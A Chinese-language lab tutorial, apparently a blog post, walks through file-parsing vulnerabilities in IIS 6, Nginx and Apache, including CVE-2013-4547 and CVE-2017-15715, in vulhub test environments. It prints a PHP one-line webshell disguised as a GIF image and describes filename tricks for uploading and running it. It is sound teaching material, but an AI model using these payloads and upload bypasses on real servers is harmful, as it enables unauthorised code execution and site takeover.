文件解析漏洞 iis apache nginx中间件相关漏洞详解

1.虚拟机下载

MSDN, 我告诉你 - 做一个安静的工具站 该网址中有所需要的所有操作系统,详细信息中有下载地址,复制后打开迅雷会自动跳转等待下载完成即可。

2.安装虚拟机

下载后会有一个光盘映像文件,打开VM在VM中创建虚拟机按下列图片走即可。

所需要的所有虚拟机安装方式均与上面方式相同

IIS安装

打开控制面板,添加或删除程序,添加或删除Windows组件,应用程序服务器。安装即可

IIS解析漏洞

1.iis6.x

环境:Windows server 2003+iis6

  1. 目录解析

在IIS网站下创建一个1.asp目录放入1.txt文件,并输入 <%= Now() %> asp语句

在网站访问该目录下的1.txt文件即可将里面的asp语句解析执行

如果遇到无法访问403的问题,右击网站点击属性执行权限更改即可。

  1. 畸形文件解析

在IIS 6 中分号也可以起到截断的作用 1.asp;.jpg是可以当做asp文件解析的

在网站中创建一个1.asp;.jpg文件进行访问,返回的页面是解析asp执行后的文件

向asa/cer/cdx都是可以被当做asp执行的

Nginx解析漏洞

1.Nginx_parsing

利用条件:

Nginx<=0.8.37 cgi.fix_pathinfo=1

使用vulhub开启容器,创建nginx_parsing_vulnerability漏洞环境。当访问文件时如果URL中有不存在的文件,php会向前解析,在一个文件加上/.php会将文件解析为php文件

复制代码
cd /nginx/nginx_parsing_vulnerability
docker-compose build
docker-compose up -d
docker ps -a

创建一个图片马进行上传

复制代码
GIF89a
<?php @eval($_POST[cmd]);?>

上传成功,访问时加上/.php将文件解析为php文件

使用蚁剑连接

Nginx CVE-2013-4547

开启vulhub环境后访问

编写1.jpg

进行上传抓包,将上传文件名后缀加两个空格.php,然后进入十六进制里面吧第二个空格的20改为00后放行。

访问上传的文件抓包,因为上传时更改了后缀名所以抓包更改。

这样就代表已经访问到木马了,生成了新的shell.php我们去访问这个文件然后使用蚁剑连接即可。

Apache解析漏洞

Apache_parsing

Apache1.x/2.x中解析文件的规则是从右到左解析,后缀无法解析就继续往左解析,所以我们是可以使用1.php.jpg里面写php一句话木马,这样就可以执行到php后缀时将其解析。

将创建的文件提交后访问可使木马运行,进行连接

CVE-2017-15715

开启漏洞环境后访问,上传文件后会给我们进行重命名

该漏洞在解析 1.php\x0A将被按照php后缀进行解析,所以我们在上传文件的时候抓包修改重命名后的文件名,在后面添加空格后将十六进制改为0a后放行,我们再次访问我们的代码时要将我们的0a改回来才可以访问到

相关推荐
lang201509283 小时前
Apache Ignite缓存基本操作
缓存·apache·ignite
土豆丶杨13 小时前
linxu CentOS 配置nginx
linux·nginx·centos
索芙特安吉尼尔1 天前
apache-doris安装兼datax-web配置
apache
快乐肚皮1 天前
Zookeeper学习专栏(八):使用高级客户端库Apache Curator
学习·zookeeper·apache
lang201509281 天前
Apache Ignite扫描查询
apache·ignite·扫描查询
雪中何以赠君别1 天前
【开发技能】Nginx学习笔记相关
nginx
antzou1 天前
Apache PDFBox深入实践
pdfbox·办公软件·apache·效率工具
lang201509281 天前
Apache Ignite 中 WHERE 子句中的子查询(Subqueries in WHERE Clause)的执行方式
apache·ignite
苹果醋32 天前
Golang在Web开发中的应用
java·运维·spring boot·mysql·nginx
随心点儿2 天前
vue2 webpack 部署二级目录、根目录nginx配置及打包配置调整
前端·nginx·webpack·根目录·二级目录